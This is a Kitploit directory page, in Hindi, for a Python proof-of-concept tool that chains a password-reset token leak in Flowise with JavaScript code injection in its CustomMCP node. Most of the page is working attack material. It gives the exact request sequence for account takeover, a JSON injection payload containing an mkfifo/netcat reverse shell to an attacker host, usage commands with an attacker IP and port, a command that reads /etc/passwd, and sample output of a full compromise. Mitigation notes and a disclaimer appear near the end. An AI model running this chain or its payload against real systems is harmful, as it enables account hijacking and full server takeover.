Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-58434-AND-59528-POC — मॉड्यूलर PoC CVE-2025-58434 (खाता अधिग्रहण) और CVE-2025-59528 (RCE) के लिए Flowise में। अनधिकृत टोकन लीक से लेकर रिवर्स शेल या कस्टम कमांड के माध्यम से रिमोट कोड निष्पादन तक पूरी हमले की श्रृंखला को स्वचालित करता है। | Kitploit
उपकरण/GitHubGitHub/kartik2005221/cve-2025-58434-and-59528-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणलर्निंग और शिक्षारिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHub
kartik2005221/cve-2025-58434-and-59528-poc

CVE-2025-58434-AND-59528-POC

मॉड्यूलर PoC CVE-2025-58434 (खाता अधिग्रहण) और CVE-2025-59528 (RCE) के लिए Flowise में। अनधिकृत टोकन लीक से लेकर रिवर्स शेल या कस्टम कमांड के माध्यम से रिमोट कोड निष्पादन तक पूरी हमले की श्रृंखला को स्वचालित करता है।

रिपॉजिटरी देखें
1925 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Flowise डुअल CVE PoC — CVE-2025-58434 + CVE-2025-59528

CVE-1 CVE-2 CVSS Python License

⚠️ केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए।
इस टूल को उन सिस्टमों के विरुद्ध चलाना जिनके स्वामी आप नहीं हैं या जिनके परीक्षण के लिए आपके पास लिखित अनुमति नहीं है, अवैध है।


विषय-सूची

  • अवलोकन
  • कमजोरियों का विवरण
    • CVE-2025-58434 — खाता अधिग्रहण
    • CVE-2025-59528 — रिमोट कोड निष्पादन
  • संपूर्ण आक्रमण श्रृंखला
  • प्रभावित संस्करण
  • रिपॉजिटरी संरचना
  • आवश्यकताएँ
  • स्थापना
  • उपयोग
    • डिफ़ॉल्ट व्यवहार
    • सहायता स्क्रीन
    • चेन मोड
    • मॉड्यूल — ATO
    • मॉड्यूल — लॉगिन
    • मॉड्यूल — RCE
  • फ्लैग संदर्भ
  • रिवर्स शेल बनाम कस्टम कमांड
  • उदाहरण आउटपुट
  • उपाय
  • प्रकटीकरण समयरेखा
  • संदर्भ
  • अस्वीकरण

  • अवलोकन

    यह रिपॉजिटरी Flowise में पाई गई दो गंभीर कमजोरियों को एक एकल, मॉड्यूलर PoC टूल में संयोजित करती है।

    CVE-2025-58434CVE-2025-59528
    प्रकारखाता अधिग्रहणरिमोट कोड निष्पादन
    प्रमाणीकरण आवश्यकनहींहाँ (कोई भी मान्य खाता)
    CVSS9.8 गंभीरगंभीर
    प्रभावितक्लाउड + स्व-होस्टेडस्व-होस्टेड

    दोनों कमजोरियाँ स्वाभाविक रूप से श्रृंखलाबद्ध होती हैं: CVE-2025-58434 बिना प्रमाणीकरण के खाता अधिग्रहण प्रदान करती है, जो CVE-2025-59528 की प्रमाणीकरण आवश्यकता को पूरा करती है — एक ही स्वचालित रन में बिना प्रमाणीकरण के RCE प्राप्त करती है।


    कमजोरियों का विवरण

    CVE-2025-58434 — खाता अधिग्रहण

    मूल कारण: forgot-password एंडपॉइंट पासवर्ड रीसेट टोकन (tempToken) को केवल ईमेल के माध्यम से भेजने के बजाय सीधे HTTP प्रतिक्रिया बॉडी में लौटाता है।

    आक्रमण चरण:

    1. किसी भी पंजीकृत ईमेल के साथ POST /api/v1/account/forgot-password
    2. JSON प्रतिक्रिया से tempToken पढ़ें — ईमेल एक्सेस की आवश्यकता नहीं
    3. लीक हुए टोकन के साथ POST /api/v1/account/reset-password → नया पासवर्ड सेट करें
    4. पीड़ित के रूप में लॉगिन करें

    लीक हुई प्रतिक्रिया (संक्षिप्त):

    root@kitploit:~
    {
      "user": {
        "email": "[email protected]",
        "tempToken": "LEAKED_TOKEN_HERE",
        "tokenExpiry": "2025-08-19T13:00:33.834Z",
        "status": "active"
      }
    }
    

    CVE-2025-59528 — रिमोट कोड निष्पादन

    मूल कारण: CustomMCP नोड उपयोगकर्ता द्वारा प्रदत्त mcpServerConfig को बिना किसी सैनिटाइज़ेशन के सीधे JavaScript के Function() कंस्ट्रक्टर में पास करता है। चूँकि Flowise Node.js पर चलता है, इंजेक्ट किया गया कोड child_process, fs, और सभी Node.js बिल्ट-इन तक पूर्ण पहुँच रखता है।

    कमजोर कोड पथ:

    root@kitploit:~
    POST /api/v1/node-load-method/customMCP
      -> convertToValidJSONString()
        -> Function('return ' + mcpServerConfig)()   ← unsanitized user input
    

    आवश्यक हेडर:

    root@kitploit:~
    Content-Type:   application/json
    x-request-from: internal
    Cookie:         token=<jwt>; refreshToken=<jwt>; connect.sid=<sid>
    

    डिफ़ॉल्ट इंजेक्शन पेलोड (रिवर्स शेल):

    root@kitploit:~
    {
      "loadMethod": "listActions",
      "inputs": {
        "mcpServerConfig": "({x:(function(){const cp=process.mainModule.require(\"child_process\");cp.exec(\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc LHOST LPORT >/tmp/f\");return \"shell_fired\";})()})"
      }
    }
    

    नोट: रिवर्स शेल पेलोड cp.exec() (एसिंक्रोनस / फायर-एंड-फॉरगेट) का उपयोग करते हैं, जिससे HTTP अनुरोध तुरंत लौट आता है और टूल टाइमआउट नहीं करता। सामान्य कमांड cp.execSync() का उपयोग करते हैं और आउटपुट इनलाइन लौटाते हैं।


    संपूर्ण आक्रमण श्रृंखला

    root@kitploit:~
    Attacker                              Flowise API
       │                                      │
       │  [CVE-2025-58434]                    │
       │  POST /forgot-password {email}       │
       │─────────────────────────────────────►│
       │◄─────────────────────────────────────│
       │  201 { tempToken: "abc..." }         │  ← token leaked in response
       │                                      │
       │  POST /reset-password                │
       │  {email, tempToken, newPassword}     │
       │─────────────────────────────────────►│
       │◄─────────────────────────────────────│
       │  201 OK (tempToken cleared)          │  ← ATO complete
       │                                      │
       │  [CVE-2025-59528]                    │
       │  POST /auth/login {email, newPass}   │
       │─────────────────────────────────────►│
       │◄─────────────────────────────────────│
       │  200 OK + Set-Cookie: token=...      │  ← cookies extracted
       │                                      │
       │  POST /node-load-method/customMCP    │
       │  {mcpServerConfig: <js-revshell>}    │
       │─────────────────────────────────────►│
       │                              [exec() fires in background]
       │◄─────────────────────────────────────│
       │  200 {"shell_fired"}                 │
       │                                      │
       Attacker's nc listener ←─────────────── Server connects back
       ✓  Full RCE from zero credentials
    

    प्रभावित संस्करण

    घटकस्थिति
    Flowise क्लाउड (cloud.flowiseai.com)CVE-2025-58434 से प्रभावित
    Flowise स्व-होस्टेड (पैच से पहले के सभी संस्करण)दोनों CVE से प्रभावित

    पैच किए गए रिलीज़ नंबरों के लिए आधिकारिक Flowise सुरक्षा सलाह देखें।


    रिपॉजिटरी संरचना

    root@kitploit:~
    flowise-dual-cve-poc/
    ├── flowise_poc.py      # Main PoC — all modules + chain mode
    ├── requirements.txt    # Python dependencies
    ├── README.md           # This file
    └── DISCLAIMER.md       # Full legal notice
    

    आवश्यकताएँ

    • Python 3.7+
    • requests लाइब्रेरी

    स्थापना

    root@kitploit:~
    git clone https://github.com/yourhandle/flowise-dual-cve-poc
    cd flowise-dual-cve-poc
    pip install -r requirements.txt
    

    उपयोग

    डिफ़ॉल्ट व्यवहार

    किसी मोड फ्लैग की आवश्यकता नहीं है। यदि आप स्क्रिप्ट को --chain या --module के बिना चलाते हैं, तो यह स्वचालित रूप से पूर्ण चेन मोड में चलती है। डिफ़ॉल्ट RCE पेलोड एक रिवर्स शेल है — बस --lhost और --lport प्रदान करें।

    root@kitploit:~
    # Minimal invocation — full chain + reverse shell
    python3 flowise_poc.py \
      -u http://flowise.example.com \
      -e [email protected] \
      --lhost 10.10.16.35 \
      --lport 4444
    

    चलाने से पहले अपना लिसनर प्रारंभ करें:

    root@kitploit:~
    nc -lvnp 4444
    

    सहायता स्क्रीन

    root@kitploit:~
    python3 flowise_poc.py -h
    

    चेन मोड

    सभी चार चरणों को एंड-टू-एंड चलाता है: टोकन लीक करें → पासवर्ड रीसेट करें → लॉगिन करें → RCE।

    root@kitploit:~
    # Reverse shell (default payload)
    python3 flowise_poc.py --chain \
      -u http://flowise.example.com \
      -e [email protected] \
      --lhost 10.10.16.35 --lport 4444
    
    # Custom command instead of reverse shell
    python3 flowise_poc.py --chain \
      -u http://flowise.example.com \
      -e [email protected] \
      -c "cat /etc/passwd"
    
    # Custom ATO password + reverse shell
    python3 flowise_poc.py --chain \
      -u http://flowise.example.com \
      -e [email protected] \
      -p "MyCustomPass1!" \
      --lhost 10.10.16.35 --lport 9001
    

    मॉड्यूल — ATO

    tempToken लीक करें और खाते का पासवर्ड रीसेट करें। लॉगिन/RCE से पहले रुक जाता है।

    root@kitploit:~
    # Default new password
    python3 flowise_poc.py --module ato \
      -u http://flowise.example.com \
      -e [email protected]
    
    # Custom new password
    python3 flowise_poc.py --module ato \
      -u http://flowise.example.com \
      -e [email protected] \
      -p "NewPassword2025!"
    
    # Print raw JSON response
    python3 flowise_poc.py --module ato \
      -u http://flowise.example.com \
      -e [email protected] --json-output
    

    मॉड्यूल — लॉगिन

    प्रमाणित करें और मैन्युअल उपयोग के लिए तीन सत्र कुकीज़ निकालें।

    root@kitploit:~
    python3 flowise_poc.py --module login \
      -u http://flowise.example.com \
      -e [email protected] \
      -P "password123"
    
    # JSON output for scripting
    python3 flowise_poc.py --module login \
      -u http://flowise.example.com \
      -e [email protected] \
      -P "password123" --json-output
    

    मॉड्यूल — RCE

    सर्वर पर निष्पादित करें। यदि --token नहीं दिया गया है तो स्वतः लॉगिन करता है।

    root@kitploit:~
    # Reverse shell — auto-login
    python3 flowise_poc.py --module rce \
      -u http://flowise.example.com \
      -e [email protected] -P "password123" \
      --lhost 10.10.16.35 --lport 4444
    
    # Custom command — auto-login
    python3 flowise_poc.py --module rce \
      -u http://flowise.example.com \
      -e [email protected] -P "password123" \
      -c "id"
    
    # Manual token — reverse shell
    python3 flowise_poc.py --module rce \
      -u http://flowise.example.com \
      --token "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." \
      --lhost 10.10.16.35 --lport 4444
    
    # All three cookies manually
    python3 flowise_poc.py --module rce \
      -u http://flowise.example.com \
      --token "eyJhbGci..." \
      --refresh-token "eyJhbGci..." \
      --connect-sid "s%3A4rey2nuk..." \
      -c "ls /root"
    

    फ्लैग संदर्भ

    मोड (सभी वैकल्पिक — डिफ़ॉल्ट --chain है)

    फ्लैगविवरण
    --chainपूर्ण श्रृंखला: ATO → लॉगिन → RCE
    --module atoकेवल खाता अधिग्रहण
    --module loginकेवल लॉगिन और कुकीज़ निकालना
    --module rceकेवल RCE

    लक्ष्य

    फ्लैगशॉर्टविवरणआवश्यक
    --url-uFlowise इंस्टेंस का बेस URLहमेशा
    --email-eलक्ष्य / लॉगिन ईमेलहमेशा

    ATO विकल्प

    फ्लैगशॉर्टविवरणडिफ़ॉल्ट
    --new-password-pATO के बाद पीड़ित खाते पर सेट किया गया पासवर्डFlowise@Pwn3d2025!

    प्रमाणीकरण विकल्प

    फ्लैगशॉर्टविवरण
    --login-password-Pलॉगिन मॉड्यूल / RCE ऑटो-लॉगिन के लिए पासवर्ड
    --token—मैन्युअल रूप से token कुकी प्रदान करें (लॉगिन छोड़ देता है)
    --refresh-token—मैन्युअल रूप से refreshToken कुकी प्रदान करें
    --connect-sid—मैन्युअल रूप से connect.sid कुकी प्रदान करें

    RCE विकल्प

    फ्लैगशॉर्टविवरणडिफ़ॉल्ट
    --lhost—रिवर्स शेल के लिए आक्रमणकर्ता IP—
    --lport—रिवर्स शेल के लिए आक्रमणकर्ता पोर्ट—
    --command-cकस्टम OS कमांड (रिवर्स शेल को ओवरराइड करता है)id यदि lhost/lport नहीं दिया गया

    विविध

    फ्लैगशॉर्टविवरणडिफ़ॉल्ट
    --timeout-tHTTP टाइमआउट (सेकंड)15
    --json-output-jकच्ची JSON प्रतिक्रियाएँ प्रिंट करेंfalse

    रिवर्स शेल बनाम कस्टम कमांड

    स्क्रिप्ट स्वचालित रूप से सही निष्पादन मोड चुनती है:

    परिदृश्यउपयोग किया गया पेलोडHTTP व्यवहार
    --lhost + --lport (-c के बिना)mkfifo netcat वन-लाइनरcp.exec() — एसिंक्रोनस, तुरंत लौटता है
    -c "..." जिसमें nc/mkfifo/bash -i होरिवर्स शेल के रूप में पहचाना गयाcp.exec() — एसिंक्रोनस, तुरंत लौटता है
    -c "id" या कोई अन्य सामान्य कमांडउपयोगकर्ता कमांडcp.execSync() — ब्लॉक करता है, आउटपुट लौटाता है
    न तो -c, न --lhostidcp.execSync() — ब्लॉक करता है, आउटपुट लौटाता है

    एसिंक्रोनस निष्पादन का अर्थ है कि HTTP अनुरोध तुरंत पूरा हो जाता है — रिवर्स शेल पेलोड पर कोई टाइमआउट त्रुटि नहीं होती।


    उदाहरण आउटपुट

    root@kitploit:~
      [Step 1] [CVE-2025-58434] Requesting forgot-password token ...
      [*] HTTP 201
      ────────────────────────────────────────────────────────────────────
        LEAKED ACCOUNT DATA
      ────────────────────────────────────────────────────────────────────
      tempToken     : 28HYxS1UFqalMGMKVQeEdapifG0Mo...
      tokenExpiry   : 2026-04-13T05:14:17.621Z
      ────────────────────────────────────────────────────────────────────
      [+] VULNERABLE — token disclosed without authentication!
    
      [Step 2] [CVE-2025-58434] Resetting password → Flowise@Pwn3d2025!
      [*] HTTP 201
      [+] Password reset SUCCESSFUL (tempToken cleared)
      [+] Account takeover complete → [email protected] / Flowise@Pwn3d2025!
    
      [Step 3] [Auth] Logging in to extract session cookies ...
      [*] HTTP 200
      ────────────────────────────────────────────────────────────────────
        EXTRACTED SESSION COOKIES
      ────────────────────────────────────────────────────────────────────
      token           : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
      refreshToken    : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
      connect_sid     : s%3AGIjQFOoMQOpwioeZdmlruKL6VSQ1cePu...
      ────────────────────────────────────────────────────────────────────
    
      [Step 4] [CVE-2025-59528] Executing RCE via CustomMCP ...
      [*] HTTP 200
      ────────────────────────────────────────────────────────────────────
        RCE RESULT
      ────────────────────────────────────────────────────────────────────
      Mode    : Reverse Shell
      LHOST   : 10.10.16.35
      LPORT   : 4444
      [+] Reverse shell payload fired!
      [!] Waiting for connection on 10.10.16.35:4444 ...
      [!] Make sure your listener is running: nc -lvnp 4444
      ────────────────────────────────────────────────────────────────────
      [+] CHAIN COMPLETE
    

    उपाय

    CVE-2025-58434 के लिए

    • API प्रतिक्रियाओं में टोकन कभी न लौटाएँ। tempToken को केवल पंजीकृत ईमेल के माध्यम से भेजें।
    • ईमेल मौजूद है या नहीं, इसकी परवाह किए बिना एक सामान्य सफलता संदेश लौटाएँ (एन्यूमरेशन रोकता है)।
    • टोकन को एकल-उपयोग, अल्पकालिक (≤15 मिनट), और अनुरोध संदर्भ से जुड़ा बनाएँ।
    • forgot-password एंडपॉइंट पर रेट-लिमिट लागू करें।

    CVE-2025-59528 के लिए

    • उपयोगकर्ता इनपुट को Function(), eval(), या vm.runInThisContext() में कभी न पास करें।
    • mcpServerConfig को केवल डेटा के रूप में पार्स करें (जैसे, JSON.parse()) — इसे कभी निष्पादित न करें।
    • यदि डायनामिक मूल्यांकन आवश्यक है, तो प्रतिबंधित संदर्भ वाले एक पृथक सैंडबॉक्स का उपयोग करें।
    • सख्त इनपुट सत्यापन और अनुमत कॉन्फ़िगरेशन कुंजियों की एक अलाउलिस्ट लागू करें।

    सामान्य

    • क्लाउड और स्व-होस्टेड दोनों डिप्लॉयमेंट को पैच करें।
    • पासवर्ड रीसेट और node-load-method एंडपॉइंट पर लॉगिंग और अलर्टिंग सक्षम करें।
    • सभी एडमिन खातों के लिए MFA पर विचार करें।

    प्रकटीकरण समयरेखा

    दिनांकघटना
    2025-08-19CVE-2025-58434 खोजा गया और रिपोर्ट किया गया
    TBDCVE-2025-59528 खोजा गया और रिपोर्ट किया गया
    TBDविक्रेता द्वारा स्वीकृति
    TBDपैच जारी किया गया
    TBDसार्वजनिक प्रकटीकरण

    संदर्भ

    • GHSA-wgpv-6j63-x5ph — CVE-2025-58434
    • GHSA-3gcm-f6qx-ff7p — CVE-2025-59528
    • Flowise GitHub
    • CWE-640: कमजोर पासवर्ड पुनर्प्राप्ति तंत्र
    • CWE-94: कोड निर्माण का अनुचित नियंत्रण

    अस्वीकरण

    केवल शैक्षिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए।
    पूर्ण कानूनी सूचना के लिए DISCLAIMER.md देखें।

    टूल डाउनलोड करें